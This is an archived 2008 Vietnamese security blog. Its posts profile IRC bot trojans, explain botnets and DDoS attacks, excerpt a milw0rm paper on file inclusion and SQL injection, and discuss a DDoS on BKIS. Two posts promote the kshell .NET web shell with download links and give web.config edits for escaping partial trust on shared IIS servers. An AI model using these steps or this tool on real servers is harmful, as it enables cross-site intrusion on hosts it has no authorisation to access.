Tên gọi khác: W32.IRCBot,

Cổng (Ports): tự cấu hình

Sử dụng: Truy nhập từ xa / IRC trojan

Registers: HKEY_LOCAL_MACHINE \SOFTWARE \Microsoft \Windows \CurrentVersion\ Run\

Hệ điều hành chịu tác động: Wi ndows 95, 98, ME, NT, 2000, XP.


Hình 5. Minh họa tấn công sử dụng mIRC











Evilbot

Hình 6. EvilBot v1.0

Nguồn : http://www.megasecurity.org/trojans/e/evilbot/Evilbot_a.html


Kích thước file nén: 15.904 bytes

Cổng (Ports): mặc định 6667 (có thể thay đổi)

Mục đích sử dụng: Truy nhập từ xa / IRC trojan / Công cụ tấn công DDoS / tải trojan về máy nạn nhân

Registers: HKEY_LOCAL_MACHINE \Software\Microsoft \Windows \CurrentVersion\ Run\ Hệ điều hành chịu tác động: Windows 95, 98, ME, NT, 2000 , XP.

Thông tin them:

http://securityresponse.symantec.com/avcenter/venc/data/pf/backdoor.evilbot.html


SlackBot

Tên gọi khác : Backdoor.Slackbot, DDOS/Slack, Troj/Slack, Slack,

Cổng (Ports): 6667 (có thể thay đổi)

Files: Slackbot.zip - Slackbot1_0.zip - Zwbv.exe - Sbconfig.exe -

Mục đích sử dụng: Truy nhập từ xa / IRC trojan / Công cụ tấn công DDoS / tải trojan về máy nạn nhân

Registers: HKEY_LOCAL_MACHINE \Software\Microsoft \Windows \CurrentVersion\ Run\ Hệ điều hành chịu tác động: tất cả các phiên bản của hệ điều hành windows cùng với các phần mềm IRC.

Ý kiến [0] - Chuyên mục: Bảo mật


16 Tháng Mười 2008
@ 11:04
Ý kiến [0]
Bot & Botnet (phần 2)
(Được đăng bởi: Phạm Đức Hải)

    1. Các thành phần cơ bản của IRC Bot

Attack

Bản chất bot là một chương trình nguy hiểm đã được lây nhiễm vào máy tính nạn nhân và bị kiểm soát bởi kẻ tấn công. Các bot được cấu hình để kết nối vào một kênh IRC bí mật và đợi lệnh tấn công .

- Bot: thường là một file thực thi, có khả năng thực hiện một tập lệnh đã được lập trình trước. Các lệnh này thường tác động trực tiếp đến máy tính bị lây nhiễm như ẩn các tác vụ của người quản trị. Bot sẽ tự copy đến một thư mục bí mật và thay đổi cấu hình trên máy lây nhiễm cho phép nó tự động kích hoạt khi máy khởi động.

Ví dụ trên nền Widows bot sẽ kích hoạt một phiên bản của nó lúc máy tính khởi động bằng cách thêm thông tin vào Registry : HKEY_LOCAL_MACHINE\SOFTWARE\ Microsoft\Windows \CurrentVersion\Run\

Thông thường bản nén của một bot có kích thước không quá 15kb.

Bot được lây nhiễm dưới dạng virus, sâu máy tính các loại malware khác hay được phát tán từ các site độc hại, site bị hacker kiểm soát. Với cách phát tán từ các website bot được tự động tải về máy do các lỗi của trình duyệt hay do người dùng không biết và click vào. Hình ảnh sau cho thấy mã cử một website đã bị chèn một file thực thin guy hiểm tên là Trojan.exe

Hình 02 . Mã một trang phát tán mã độc

Hình 3. Các thành phần IRC BOT


- Máy nạn nhân (Victim machine, hay còn gọi là zombie hay máy tính ma): là một máy tính có kết nối internet, đã bị cài một phần mềm nguy hiểm đóng vai trò là một bot của một botnet. Phần mềm nguy hiểm này có thể được cài theo nhiều cách, một trong các cách đó là cách lây nhiễm kể trên. Hay bị cài do các lỗi của phần mềm, hệ điều hành và gần đây một cách rất phổ biến là lây qua USB.


- Kẻ tấn công (Attacker): là người đã tạo ra và phát tán bot, người điều khiển và ra lệnh cho các bot kết nối tới server,kênh IRC định trước, là người ra lệnh tấn công đối với các bot.


- Kênh điều khiển (Control channel): là một kênh IRC bí mật được kẻ tấn công tạo ra nhằm kết nối các máy tính đã kiểm soát thông qua các bot khi các máy tính này kết nối vào mạng.Thông tin về kênh này đã được định sẵn trong các bot hay các bot có cơ chế để tự động cập nhật thông tin về kênh này.


-Máy chủ IRC (IRC Server): là máy chủ cung cấp dịch vụ IRC. Một số nguồn cung cấp dịch vụ IRC phổ biến như DALNET ... Kẻ tấn công cũng có thể dựng một máy chủ riêng.


-Botnet : tất cả các bot khi kết nối tới kênh điều khiển tạo thành mộ mạng lớn các nút gọi là botnet. Botnet này sẽ ở trong trạng thái sẵn sằng chờ lệnh tấn công của kẻ tạo ra nó.


    1. Các mối nguy hiểm bot và botnet có thể tạo ra


Các hành động sau có thể được thực hiện bởi kẻ tấn công khi sử dụng bot và botbet:

-Tấn công từ chối dịch vụ (DoS attack): đây chính là lý do lớn nhất khiến kẻ xấu sử dụng IRC bot. Kẻ tấn công có thể sử dụng sức mạnh của đội quân zombie bằng cách điều khiển và phát lệnh tấn công tới mục tiêu. Có thể hạ gục mục tiêu bằng các dòng dữ liệu UDP, ICMP lớn hay gửi các yêu cầu đồng bộ làm lụt TCP gây ghẽn đường truyền.

- Tiếp tục lây nhiễm cục bộ : với bot đã có kẻ tấn công có thể chiếm toàn bộ quyền kiểm soát máy bị lây nhiễm. Kẻ tấn công có thể tải về và cài các chương trình gián điệp (spy ware), trojan, key log…để theo dõi máy, thu thập các thông tin nhạy cảm của nạn nhân như thông tin cá nhân, tài khoản ngân hàng, thẻ tín dụng…

- Tận dụng băng thông của nạn nhân:: một mục đích sử dụng thú vị khác là tận dụng băng thông và tài nguyên rỗi của nạn nhân. Đặc biệt là các máy có băng thông rộng. Thậm chí giữa các nhóm tấn công cũng trao đổi với nhau tài nguyên này.


- Của hậu (Backdoor): với kiểu tấn công này, botnet còn có khả năng ẩn dấu và mở các kêt nối bí mật ra ngoài, để kẻ tấn công có thể dễ dàng xâm nhập vào lần tiếp theo.


- Chứa dữ liệu bất hợp pháp :với xu hướng này, kẻ tấn công có thể tân dụng các bot làm các mạng chia sẻ file, tận dụng để lưu trữ file, phần mềm bất hợp pháp, các đoạn video riêng,…

Thêm nữa, với việc giám sá các bot, kẻ tấn công có thể một cách bí mật theo dõi các ISP.


- Gửi thư rác (spam mail) : đây thực sự là một thách thức lớn đối với các chuyên gia bảo mật. Theo thông tin mới nhất (10/2008) các mạng botnet trung bình một ngày gửi 60 tỉ thư rác chiếm 20% tổng số thư rác/ngày.


    1. Mục tiêu và nạn nhân chính của bot & botnet

Tất cả các nguồn kết nối tới internet đều có thể là mục tiêu tấn công của kẻ xấu. Các hệ thống sơ hở có thể bị lây nhiễm bot là các hệ thống ít giám sát, băng thông và tài nguyên lớn, các máy tính cá nhân sử dụng ở nhà, các máy tính cá nhân, các máy chủ ở các trường đại học.


- Hệ thống có băng thông lớn: một trong các loại nguồn kết nối đến internet là các máy có đường truyền băng thông rộng, những máy như thế này có thể được sử dụng để tấn công từ chối dịch vụ phân tán (DDoS) hay lưu trữ file, phần mềm.


- Hệ thống có tính sẵn sang cao: kẻ tấn công luôn thích những hệ thống,máy có tính sẵn sang cao như : thời gian kết nối vào mạng lớn, tài nguyên dồi dào. Những hệ thống như thế sẽ luôn sẵn sang cho việc tấn công.


- Các hệ thống ít được giám sát và quan tâm: các hệ thống ít được để ý, quan tâm đến như không cập nhật bản vá, không có phần mềm bảo vệ … Kẻ xấu có thể tạo ra các công cụ tự động để rà, quét và tấn công các mục tiêu này, biến các mục tiêu này thành một nút của một botnet mà chủ nhân của nó không hề hay biết.


- Các hệ thống có vị trí địa lý xa: kẻ tấn công thích kiểm soát các hệ thống, máy tính ở những vùng địa lý xa với nơi kẻ tấn công ở nhằm tránh luật pháp sở tại và cũng để tiện cho việc che dấu dấu vết.


(Còn nữa)


Ý kiến [0] - Chuyên mục: Bảo mật


16 Tháng Mười 2008
@ 10:58
Ý kiến [0]
Bot & Botnet (phần 1)
(Được đăng bởi: Phạm Đức Hải)
1. Lời nói đầu
Internet ngày càng phát triển, cùng với nó các mạng botnet được sinh ra một cách bí mật và tiềm ẩn những nguy cơ lớn đối với an ninh mạng. Số lượng và kích cỡ botnet ngày càng tăng. Người ta đã tìm thấy và gỡ bỏ nhiều botnet trên Internet. Cảnh sát Hà Lan đã tìm thấy một botnet gồm 1.5 triệu nút và ISP Telenor của Na Uy đã dỡ bỏ một botnet 10.000 nút. Ở Việt Nam điển hình là vụ tấn công từ chối dịch vụ Flash-DDoS bằng botnet vào trang thương mại Việt Cơ (2006) và gần đây nhất là vụ tấn công DDoS hàng loạt các site như 5giay.vn, nhatnghe.vn,bkav.com.vn (của BKIS – Trung tâm an ninh mạng ĐHBKHN) ( tháng 09/2008 ) bằng botnet với số lượng máy bị kiểm soát lên đến hàng ngàn. Người ta đã khởi động các hoạt động hợp tác quốc tế lớn nhằm dập tắt các botnet. Vậy botnet là gì ? Botnet hình thành và hoạt động như thế nào? Các nguy cơ của botnet ? Bài viết này tôi sẽ đề cập đến IRC botnet và trả lời các câu hỏi trên.

    1. DoS và DDoS

Một cuộc tấn công từ chối dịch vụ (tấn công DoS) hay tấn công từ chối dịch vụ phân tán (tấn công DDoS) là sự cố gắng làm cho tài nguyên của một máy tính không thể sử dụng được nhằm vào những người dùng của nó. Mặc dù phương tiện để tiến hành, động cơ, mục tiêu của tấn công từ chối dịch vụ là khác nhau, nhưng nói chung nó gồm có sự phối hợp, sự cố gắng ác ý của một người hay nhiều người để chống lại Internet site hoặc service (dịch vụ Web) vận hành hiệu quả hoặc trong tất cả, tạm thời hay một các không xác định. Thủ phạm tẩn công từ chối dịch vụ nhằm vào các mục tiêu site hay server tiêu biểu như ngân hàng, cổng thanh toán thẻ tín dụng và thậm chí DNS root servers.

Một phương thức tấn công phổ biến kéo theo sự bão hoà máy mục tiêu với các yêu cầu liên lạc bên ngoài, đến mức nó không thể đâp ứng giao thông hợp pháp, hoặc dáp ứng quá chậm. Trong điều kiện chung, các cuộc tấn công DoS được bổ sung bởi ép máy mục tiêu khởi động lại hoặc tiêu thụ hết tài nguyên của nó đến mức nó không cung cấp dịch vụ, hoặc làm tắc nghẽn liên lạc giữa người sử dụng và nạn nhân.

Tấn công từ chối dịch vụ đựoc lưu ý sự vi phạm chính sách sử dụng đúng internet của IAB(Internet Architecture Board). Chúng cũng cấu thành sự vi phạm luật dân sự.


Phương pháp DoS truyền thống sử dụng một máy tính đơn gửi một số lượng lớn các yêu cầu (flooding requests) đến máy tính đơn khác. Mô hình DDoS sử dụng nhiều máy tính tấn công một mục tiêu đơn nhất. DDoS sử dụng mạng botnet để tấn công, về mặt lý thuyết khi mạng botnet này đủ lớn thì mục tiêu không thể chống đỡ nổi hơn nữa phương pháp này tạo ra các truy nhập hợp lệ khiến việc xác định nơi phát động tấn công là một khó khăn rất lớn.


    1. Internet Relay Chat (IRC)

IRC được sáng tạo ra bởi Jarkko Oikarinen (bí danh "WiZ") vào khoảng cuối tháng 8 năm 1988 để thay thế một chương trình có tên là MUT (MultiUser Talk) trên một kênh BBS gọi là OuluBox tại Phần Lan. Ông tìm được cảm hứng cho dự án của mình từ hệ thống Bitnet Relay Chat của mạng Bitnet.

IRC được nhiều người chú ý đến từ khi nó được dùng sau tấm màn sắt (Iron Curtain) để viết phóng sự trực tuyến về sự sụp đổ của Liên Bang Xô Viết trong khi tất cả các phương tiện truyền thông khác không hoạt động được. Thời gian gần đây, nó cũng được dùng một cách tương tự để viết phóng sự trong trận chiến giữa Kuwait và Iraq.

IRC là chữ viết tắt từ cụm từ Internet Relay Chat trong tiếng Anh. IRC là một dạng liên lạc cấp tốc qua mạng Internet. Nó được thiết kế với mục đích chính là cho phép các nhóm người trong một phòng thảo luận (channel) liên lạc với nhau. Tuy nhiên, nó cũng cho phép hai người dùng liên lạc riêng nếu họ thích.

Hiện nay IRC là mạng trò chuyện trực tuyến lớn, có vài triệu kênh trên máy phục vụ trên khắp thế giới. Giao thức viễn thông này cũ hơn IM; IRC từng là hoàn toàn đựa vào nhập thô ASCII. Tuy nhiên, hiện thời có mốt số ứng dụng đồ họa làm cho dễ sử dụng IRC hơn, gần bằng dùng IM.

Hình 01. Mô hình mạng IRC


Ngoài chát, IRC còn dùng để chia sẻ tập tin và tư liệu theo hình thức mạng ngang hàng.

Có nhiều ứng dụng khách IRC cho người dùng trên bất kỳ hệ điều hành. Một ứng dụng phổ biến là XChat. XChat là phần mềm tự do trên Linux/BSD, mặc dù phiên bản trên Windows là phần mềm dùng thử (30 ngày), cũng đã dịch sang tiếng Việt.

Conversation là một thí dụ của ứng dụng khách IRC mới, dễ dùng, đựa vào đồ họa. Không cần học hiểu lại cách sử dụng lệnh IRC.

Các ứng dụng khách Jabber cũng có khả năng trò chuyện qua IRC, nhưng chưa có truyền tải hữu hiệu.

Chương trình thông dụng khác để truy cập vào các máy chủ IRC là KVIrc và mIRC. mIRC là một phần mềm chia sẻ (shareware) dành cho người sử dụng IRC trên Windows (không hoạt động trên các hệ điều hành khác như Linux, Mac OS, PalmOS, Epoc, Atari's...), được sáng tạo, phát triển và đăng kí bản quyền bởi Khaled Mardam-Bey.


    1. Bot và botnet

Bot hay rôbôt mạng là các ứng dụng phần mềm chạy các tác vụ tự động hóa trên mạng. Thông thường, bot thực hiện các tác vụ đơn giản và có cấu trúc lặp đi lặp lại với một tần suất cao hơn nhiều so với khả năng của một soạn thảo viên là con người. Ứng dụng rộng lớn của bot là trong duyệt tự động Web theo kiểu bò loang (web spidering), trong đó một chương trình tự động tìm kiếm, phân tích và sắp xếp thông tin từ các máy chủ web với tốc độ cao hơn nhiều lần tốc độ của con người. Mỗi máy chủ có một file có tên robots.txt chứa các quy tắc cho việc bò loang tự động tại máy chủ đó, đây là các quy tắc mà con bot cần tuân theo.

Bot là viết tắt của robot, tức các chương trình tự động hoá (chứ không phải là người máy như nghĩa chúng ta vẫn gọi) thường xuyên được sử dụng trong thế giới Internet. Một ví dụ về bot đó là search enginer Người ta định nghĩa spider được dùng bởi các công cụ tìm kiếm trực tuyến, ánh xạ website và phần mềm đáp ứng theo yêu cầu trên IRC (như eggdrop) là robot.

Bên cạnh các ứng dụng kể trên, bot còn có thể được cài đặt tại nơi đòi hỏi tốc độ phản ứng cao hơn tốc độ của con người (chẳng hạn bot trò chơi điện tử và bot tại các trang web bán đấu giá) hoặc trong các tình huống cần đến sự bắt chước các hoạt động của con người (chẳng hạn các chatbot - bot nói chuyện).

Botnet là từ chỉ một tập hợp các rô bôt phần mềm hoặc các con bot hoạt động một cách tự chủ. Từ này còn được dùng để chỉ một mạng các máy tính sử dụng phần mềm tính toán phân tán.

Tuy từ "botnet" có thể dùng để chỉ một nhóm bot bất kỳ, chẳng hạn IRC bot, từ này thường được dùng để chỉ một tập hợp các máy tính đã bị tấn công và thỏa hiệp và đang chạy các chương trình độc hại, thường là sâu máy tính, trojan horse hay các cửa hậu, dưới cùng một hạ tầng cơ sở lệnh và điều khiển. Một chương trình chỉ huy botnet (botnet's originator hay bot herder) có thể điều khiển cả nhóm bot từ xa, thường là qua một phương tiện chẳng hạn như IRC, và thường là nhằm các mục đích bất chính. Mỗi con bot thường chạy ẩn và tuân theo chuẩn RFC 1459 (IRC). Thông thường, kẻ tạo botnet trước đó đã thỏa hiệp một loạt hệ thống bằng nhiều công cụ đa dạng (tràn bộ nhớ đệm, ...). Các bot mới hơn có thể tự động quét môi trường của chúng và tự lan truyền bản thân bằng cách sử dụng các lỗ hổng an ninh và mật khẩu yếu. Nếu một con bot có thể quét và tự lan truyền qua càng nhiều lỗ hổng an ninh, thì nó càng trở nên giá trị đối với một cộng đồng điều khiển botnet.

Các botnet đã trở nên một phần quan trọng của Internet, tuy chúng ngày càng ẩn kĩ. Do đa số các mạng IRC truyền thống thực hiện các biện pháp cấm truy nhập đối với các botnet đã từng ngụ tại đó, những người điều khiển botnet phải tự tìm các server cho mình. Một botnet thường bao gồm nhiều kết nối, chẳng hạn quay số, ADSL và cáp, và nhiều loại mạng máy tính, chẳng hạn mạng giáo dục, công ty, chính phủ và thậm chí quân sự. Đôi khi, một người điều khiển giấu một cài đặt IRC server trên một site công ty hoặc giáo dục, nơi các đường kết nối tốc độ cao có thể hỗ trợ một số lớn các bot khác. Chỉ đến gần đây, phương pháp sử dụng bot để chỉ huy các bot khác mới phát triển mạnh, do đa số hacker không chuyên (script kiddie) không đủ kiến thức để sử dụng phương pháp này.

Một xu hướng rất nguy hiểm trong thời gian gần đây là kẻ tấn công sử dụng botnet gồm hàng ngàn máy tính ma (máy tính đã bị khống chế hay còn gọi là zombie) để tấn công từ trối dịch vụ, nhằm vào các hệ thống của doanh nghiệp, tổ chức, chính phủ. Để tạo ra đội quân zombie hùng hậu này, chúng sử dụng virus, spyware hay các trojan lây nhiễm qua Internet, khi máy tính bị nhiểm máy tính đó sẽ bị kiểm soát một cách bí mật, từ xa bởi các Trojan. Có rất nhiều phương pháp điều khiển và quản lý zombie từ xa. Trong khuôn khổ bài viết này tôi chỉ đề cập đến việc điều khiển và quản lý bằng Trojan thong quan các kênh riêng Internet Relay Chat (IRC).


    1. IRC botnet

Mỗi một máy bị kiểm soát,bị cài một phần mềm nguy hiểm bí mật kết nối đến kênh IRC của kẻ tấn công gọi là một bot. Mạng các các kết nối tới một kênh IRC gọi là một botnet.

Bot cũng đồng nghĩa với agent (tác tử) trong phương thức DDoS truyền thống. Các bot này được điều khiển thông qua kênh IRC nó kết nối đến. Một bot khi được cài lên máy của nạn nhân, nó sẽ kết nối ra ngoài theo các cổng của dịch vụ IRC và tham gia vào các kênh riêng do kẻ tấn công tạo ra. Các kênh này năm trên các mạng phổ biến như Efnet, Undernet hay DALnet. Các mạng này là một công cụ miễn phí, ổn định để kẻ tấn công dễ dàng mở rộng, quản lý, duy trì và điều khiển đội quân bot.

Mạng IRC cung cấp cho kẻ tấn công khẳ năng dẽ dàng và mềm dẻo để điều khiển hàng trăm thậm trí hàng ngàn bot.

Theo Australian CERT, điểm cực kỳ nguy hiểm là các bot hiện nay có thể tân dụng được băng thông rộng và tài nguyên dư thừa của máy nạn nhân, những bot này sẽ có khả năng cực kỳ mạnh mẽ. Botnet với nhiều bot mạnh này sẽ tạo ra một sức mạnh vô cùng ghê gớm, có khả năng đánh sập bất kỳ hệ thống nào.


(Còn nữa)

Ý kiến [0] - Chuyên mục: Bảo mật


13 Tháng Mười 2008
@ 02:30
Ý kiến [0]
Web vulnerabilities to gain access to the system
(Được đăng bởi: Phạm Đức Hải)
http://www.milw0rm.com/papers/232
|=--------=[ Web vulnerabilities to gain access to the system ]=---------=|
|=-----------------------------------------------------------------------=|
|=----=[ pepelux[at]enye-sec[dot]org - <http://www.enye-sec.org> ]=------=|
|=-----------------------------------------------------------------------=|
|=----=[ spanish translation available in http://www.enye-sec.org ]=-----=|
|=-----------------------------------------------------------------------=|
|=---------------------------=[ Oct 12th 2008 ]-=------------------------=|

--[ Content

  1 - Introduction

  2 - Local and Remote File Inclusion (LFI/RFI)
   2.1 - Introduction
   2.2 - Executing commands remotely
    2.2.1 - Injecting PHP code into apache logs
    2.2.2 - Injecting PHP code into process table
    2.2.3 - Injecting PHP code into an image
    2.2.4 - Injecting PHP code into session files
    2.2.5 - Injecting PHP code into other files
   2.3 - Obtaining a shell
   2.4 - Remote File Inclusion

  3 - Blind SQL Injection
   3.1 - Introduction
   3.2 - Loading local files
   3.3 - Obtaining data without brute force
   3.4 - Executing commands remotely
   3.5 - Obtaining a shell

  4 - References


---[ 1 - Introduction

There are a lot of vulnerabilities that allow us to exploit a website, all of
them are old and documented. We can found LFI, RFI, SQL, XSS, SSI, ICH and
other attacks. For that reason I'm going to center this paper only in attacks
that allow us access to the system and to execute commands remotely.

It would be bored to write another paper with all kinds of vulnerabilities,
telling the same you know, for that I'll try to contribute with any new thing
and remember basic concepts superficially.
Đọc chi tiết ...
Ý kiến [0] - Chuyên mục: Bảo mật | Hack | PHP


13 Tháng Mười 2008
@ 11:00
Ý kiến [0]
What Does a System Administrator Do?
(Được đăng bởi: Phạm Đức Hải)
I'm a sysadmin but ...
What Does a System Administrator Do?

http://www.sysadminday.com/whatsysadmin.html

What is a system administrator? Well, look at the title. Administrator of systems. A system administrator takes care of systems.

Now, most people read "system" to mean an individual computer, and think that all asysadmin does is clean viruses off your computer and replace your monitor. That's not wrong -- but it is only one page of the whole story.

A real computing system is larger. Very few computers work just on their own anymore; when you use the web, play a game online, share files with a friend, or send email, you're using a complex and intricate collection of computers, networks and software that come together to do the job you're asking.

A sysadmin manages these systems -- they figure out how to bring storage from one server, processing from another, backups from a third and networking from a fourth computer all together, working seamlessly. For you.

It's not an easy task. Your sysadmins need to understand in depth computing protocols. They often have to know something about programming, something about hardware, a lot about software -- and even more about the people using their system.

A sysadmin is a professional, with complex skills, ethical challenges, and a daunting job. Many, if not most, people find computers difficult to use, and sometimes they're unreliable. Being a sysadmin doesn't absolve someone of dealing with unreliable computers. Oh, one can dream of such a day, but the opposite is true; no one sees more dead computers in a day than a sysadmin. No one sees them doing truly baffling things, and no one has more stories of computers failing, acting possessed, or even catching on fire.

The challenge of a sysadmin is making a computing system -- a whole network of resources and servers and software -- work together, work right, work even when parts of it fail -- and work for you.

That's the most important job of the sysadmin: to work for you. To take the staggering array of technologies, acronyms, protocols, networks, vendors, budgets, limited time, competing products, and threats to the computing network, assemble them all together in a working system. Their job is not only to be the geek in the corner who types all day. What they're doing is bringing these diverse pieces of technology into order, and fitting them together to fill your needs at work and home; to translate the world of computing into human terms.

This is a daunting task and we're still at the cutting edge; we're not perfect, and the field is still figuring itself out. Being a sysadmin takes a certain boldness, to be one of the first people to take on the challenge of turning difficult computers into easy to use systems. But hundreds of thousands of people are working in that field now, from the entry level help desk tech to the corporate CIOs and everyone in between.

So when you think of a sysadmin, think of the people who run the servers that help you clean it off, the people who run your backups to make sure your data is safe, the people who bring you the network, the people who monitor it for security -- and yes, the person who cleans the virus off your computer and replaces your monitor.


Ý kiến [0] - Chuyên mục: sysadmin


12 Tháng Mười 2008
@ 08:59
Ý kiến [2]
Vụ DDoS BKIS nhìn nhận từ góc độ hệ thống
(Được đăng bởi: Phạm Đức Hải)
Một số ngày qua tôi cũng có theo dõi vụ việc site của BKIS là bkav.com.vn vị tấn công DDoS.
Thủ phạm tấn công DDoS một số website VN bị bắt
Phân tích vụ việc tấn công BKAV

Trong bài này tôi không bàn đến cách tấn công hay nội dung tương tự. Qua bài quá trên VnExpress, có số liệu do chính BKIS công bố.

Kết quả điều tra của C15 và BKIS cho thấy kẻ thực hiện cuộc tấn công (cơ quan điều tra chưa tiết lộ danh tính) 
đã huy động bạn bè cài đặt virus tại các cửa hàng game, Internet công cộng. Từ đây, virus được phát tán qua USB. 
Bằng cách này, thủ phạm đã tạo dựng được một mạng botnet 
với khoảng 1.000 máy tính ma và biến nó thành công cụ DDoS.

Một mạng bottet khoảng 1000 zombie không phải là lớn. Dùng mạng này để tấn công DDoS nếu mà không tìm ra điểm DoS tốt thì khó có thể hạn gục mục tiêu. Theo thông tin tôi thấy thì các site bị DDoS trong đợt này đều DoS trực tiếp vào trang chủ của website. Điều này có nghĩa là cùng lắm là có 1000 truy nhập cùng một lúc vào site đó ? 1000 truy nhập một lúc mà đã khiến các site bị hạ gục, không còn khả năng phục vụ, như trang bkav.com.vn chẳng hạn.
Vậy có thể kết luận gì ?
1. Nếu số liệu BKIS đưa ra là đúng (1000 zombie)
- Khả nắng chống đỡ của site BKAV.COM.VN thuộc loại bình thường (nếu không muốn nói là không khác gì một site giới thiệu doanh nghiệp thông thường), không có khả năng chịu tải quá 1000 kết nối đồng thời (có thể hơn một chút vì cùng lúc đó có nhưng truy nhập thật) --> thông tin khá thú vị nhỉ.
Xem ra thì site này BKIS chạy server riêng chứ cũng không dám chạy share host. Chắc cấu hình cũng không đến mức 1PC để không chịu được 1000 kết nối. Thiết nghĩ một hệ thống như site của BKAV nên có những biệt pháp nhằm tăng cường chịu tải như caching hoặc tăng cường máy chủ, tối ưu lại code...
Thông tin thêm trên server này có ít nhất 4 site:
http://bkav.com.vn
http://www.eoffice.com.vn
http://www.bkna.com.vn
http://www.smarthome.com.vn
3 site còn lại gần như không có tải. Hay server này còn phục vụ các dịch vụ khác thì tôi không biết.
2. Khả năng còn lại là BKIS đưa ra số liệu sai ? big grin


Ý kiến [2] - Chuyên mục:


10 Tháng Mười 2008
@ 01:42
Ý kiến [0]
Local by pass server windows with kshell ?
(Được đăng bởi: Phạm Đức Hải)
Trước khi đi vào chi tiết tôi xin nêu một chút thông tin về cách thức chạy đối với 1 site trên IIS.
Một site chạy trên IIS sẽ có 2 tài khoản:
 - Tài khoản dạng _IUSR để chạy các script như php, asp,...
 - Tài khoản dạng IWAM_ để chạy work process của .NET phục vụ chạy ASP.NET. Các work process phục vụ cho 1 Application Pool nào đó.
Lưu ý là site có thể ở chế độ có khoặc không application pool.
Việc cấu hình các thông tin trên sẽ ảnh hưởng trực tiếp đến việc có thể local by pass hay không ?
Bài này tôi chỉ nói đến local by pass đối với .NET vì kshell là công cụ chạy trên .NET framework.

Local by pass là gì ?

Có thể các bạn đã nghe nói đến các lỗi php safe mode bypass trên linux và trên windows. Local bypass được hiểu một cách nôm na là truy nhập vượt ra ngoài những gì được phép. Ví dụ : trên một server có rất nhiều website, mỗi site chỉ có quyền đối với phạm vi site của mình (thư mục,...). Việc truy nhập từ site này sang site khác trên cùng server hay truy nhập ra các phần khác như ổ cứng, các thông tin hệ thống không được phép gọi là local bypass. Hacker thường lợi dụng cách này để tấn công site hàng loạt hoặc tấn công một site định trước nhưng site đó không thể tấn công trực tiếp.

Thông tin về kshell: kshell 1.2 Now Release !
Thông thường thì kshell vẫn chạy ngon lành nhưng trong một số trường hợp kshell sẽ không chạy được hoặc có báo lỗi như sau:



Đây là một thông báo rất chung, nhìn vào trang này ta sẽ không biết vì sao kshell ko chạy ?

Làm sao để cho hiển thị lỗi ?
Dùng một tool khác viết bằng asp, php hoặc thậm trí dùng FTP nếu có.
Ra thư mục gốc của site mở file web.config (nếu chưa có thì up load lên)
File mẫu : Web_config.zip (1,79 KB)
Trong file đó sửa đoạn :
<customErrors mode="RemoteOnly" />
Thành
<customErrors mode="Off" />




Khi đó nếu có thể có lỗi :



Hoặc



Lỗi này là do không đủ quyền, do server chạy ở chế độ không phải là Full Trusted đối với .NET (partial trust).  làm sao có thể vượt qua partial trust ?

Vẫn như ở bước trên trong file web.config thêm vào dòng : <trust level='Full'/>




Sau đó chạy lại kshell. Kết quả thật bất ngờ đúng không nào big grin

Chúng tôi đã kiểm thử trên rất nhiều server Việt Nam và quốc tế. Phần lớn đều có thể local bypass.
Hy vọng bài viết này sẽ giúp cho các admin hiểu rõ hơn một phương pháp tấn công local để từ đó có cách phòng tránh.
Tôi cũng hy vọng đây là một ví dụ thú vị đối với các bạn ham tìm hiểu về bảo mật.

Cảm ơn nhóm Vnsecurity checker team đã giúp tôi hoàn thành bài viết này!
Ý kiến [0] - Chuyên mục: .NET | Bảo mật | Hack


08 Tháng Mười 2008
@ 10:58
Ý kiến [0]
kshell 1.2 Now Release !
(Được đăng bởi: Phạm Đức Hải)
Có lẽ lâu rồi tôi không có thời gian cập nhật bài viết mới lên blog này, có lẽ vì nhiều việc quá big grin
Các phiên bản trước của kshell bạn có thể tham khảo tại :
Công cụ kiểm tra lỗi bảo mật cho .NET windows

Link download trực tiếp :

http://www.guru.net.vn/kshell_1.1.zip

http://duchaikhtn.googlepages.com/kshell_1.0.zip

Phiên bản 1.0 tỏ ra là chạy rất ổn định. Bản 1.1 sau thời gian đầu ra mắt bản beta các lỗi đã được khắc phục hết, hiện tại cũng chạy rất ổn định.

Phiên bản 1.2 đã được ra mắt bản beta vào hồi tháng 8. Để có bản Release ngày hôm nay, tôi rất cảm ơn sự đóng góp của các thành viên nhóm Vnsecurity checker team đặc biệt cảm ơn Hackerbinhphuoc và zatuzik.

Phiên bản 1.2 có gì mới ?

Link download : http://www.guru.net.vn/kshell_1.2.zip

Phiên bản này tỏ ra mạnh mẽ hơn hẳn 2 phiên bản trước. Đối với người quản trị thì đây là một công cụ tốt để kiểm tra bảo mật cho host .NET. Đối với hacker đây là một công cụ tuyệt vời để hack trên server windows hiện nay, một công cụ không thể bỏ qua.
Tôi cũng có một lưu ý là tôi sẽ không chịu tránh nhiệm về việc sử dụng công cụ này vào mục đích xấu. Theo khảo nghiệm của tôi thì công cụ này có thể khai thác trên hầu hết tất cả các server hiện nay, đặc biệt các server Việt Nam có rất nhiều lỗi mà khi sử dụng công cụ này sẽ phát huy tác dụng.

Tính năng : phiên bản 1.2 có thêm một số tính năng quan trọng như IIS Spy,thông tin hệ thống, list processes 2,...

IIS Spy cho phép liệt kê tất cả các site, pool trên một server. Cho phép kiểm tra các site có thể truy nhập được. Tính năng này cho phép hacker hack từ site này sang site khác,... Tính năng này dựa trên việc cấu hình không tốt của server (cái này phổ biến lắm nhá big grin )


Giao diện : lấy cảm hứng từ milw0rm nên kshell 1.2 có giao diện màu xanh, nền đen nhìn khá dịu mắt (tốt cho các admin và cho cả hacker khi làm việc ban đêm big grin )

Hy vọng đây là một công cụ hữu ích đối với bạn!

Ý kiến [0] - Chuyên mục: .NET | Bảo mật | Hack